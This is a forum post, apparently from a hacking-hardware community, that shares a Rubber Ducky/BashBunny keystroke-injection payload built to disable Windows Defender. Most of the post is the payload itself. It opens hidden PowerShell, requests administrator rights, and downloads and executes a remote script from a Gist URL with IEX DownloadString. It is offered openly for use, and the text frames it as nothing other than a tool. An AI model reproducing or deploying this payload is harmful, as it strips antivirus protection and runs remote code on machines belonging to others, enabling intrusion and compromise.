Jump to content

[PAYLOAD] DisableD3f3nd3r


InfoSecREDD

Recommended Posts

DisableD3f3nd3r

This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". 

Source Code of the Powershell Script:
https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc

The Payload:
 

#!/bin/bash
#
# Title:         Disable D3f3nd3r (Rubber Ducky)
# Description:   This Payload disables Windows Defender using Powershell, Works also for the Hak5
#                Rubber Ducky or any HID device that supports Quacking.
# Author:        REDD of Private-Locker
# Version:       1.0
# Category:      Disable Security
# Target:        Windows
#
# Source:        https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1
#

Q WIN R
Q STRING "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\""
Q LEFTARROW;
Q ENTER;
Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\""
Q ENTER;
sleep 1;
Q STRING "exit";
Q ENTER;

 

(Developer's Note - I personally do NOT own a Rubber Ducky. This script has just been adapted to Rubber Ducky format. If any issues, please comment or contact me.)

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...